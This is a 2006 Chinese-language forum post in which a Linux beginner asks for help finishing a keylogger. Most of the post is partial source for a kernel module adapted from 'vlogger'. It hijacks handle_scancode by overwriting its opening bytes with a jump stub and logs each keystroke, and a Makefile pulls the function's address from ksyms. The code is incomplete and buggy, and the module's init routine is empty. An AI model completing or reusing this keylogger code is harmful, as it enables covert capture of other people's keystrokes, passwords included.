qiaiduo 发表于 2006-11-10 09:58:08

关于劫持handle_scancode函数获得键盘记录求解

本人刚接触linux ,想做一个小小的键盘记录器,从网上DOWN了一些资料,接下去不知道该怎么写了,望各位高手指点指点
vlogger.c 文件:
#ifndef __KERNEL_SYSCALLS__
#define __KERNEL_SYSCALLS__
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/string.h>
#include <linux/interrupt.h>
#include <asm/semaphore.h>
#include <linux/init.h>
#include <linux/inet.h>


#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif

#if CONFIG_MODVERSIONS==1
#define MODVERSIONS
#include <linux/modversions.h>
#endif
//#define printk printk_R1B7D4074

static struct semaphore hserials_sem;
static int logging=1;

#define CODESIZE 7

static char hserials_code;
static char hserials_jump="\xb8\x00\x00\x00\xff\xe0";

void (*handle_scancode)(unsigned char,int) =(void(*)(unsigned char,int))
HS_ADDRESS;

void _handle_scancode(unsigned char scancode,int keydown)
{
    if (logging && keydown)
    //    sprintf(KERN_ALERT "SCAN CODE %x .\n",(int)*((char *)scancode)&0x7F);
   //   log_scancode(scancode,LOGFILE);

   printk("Scan Code %x %s.\n",
          (int) *((char *) scancode) & 0x7F,
          *((char *) scancode) & 0x80 ? "Released" : "Pressed");
   ///////////无输出,
    down(&hserials_sem);

    memcpy(handle_scancode,hserials_code,CODESIZE);
    handle_scancode(scancode,keydown);
    memcpy(handle_scancode,hserials_jump,CODESIZE);
    up(&hserials_sem);
}

int init_module(void)
{
   //不知道写什么
return 0;
}

void cleanup_module(void)
{


return;
}

MODULE_LICENSE("GPL");


makefile 文件:

# Makefile for a basic kernel module

HS_ADDRESS=0x$(word 1,$(shell ksyms -a|grep handle_scancode))

CC=/usr/bin/gcc
MODCFLAGS = -O6 -Wall -DCONFIG_KERNELD \
        -DMODULE -D__KERNEL__ -DLINUX -D HS_ADDRESS=$(HS_ADDRESS)\
        -I/usr/src/linux-2.4/include
vlogger.o: vlogger.c/usr/include/linux/version.h
        $(CC) $(MODCFLAGS) -c vlogger.c
clean:
        rm -f *.o
页: [1]
查看完整版本: 关于劫持handle_scancode函数获得键盘记录求解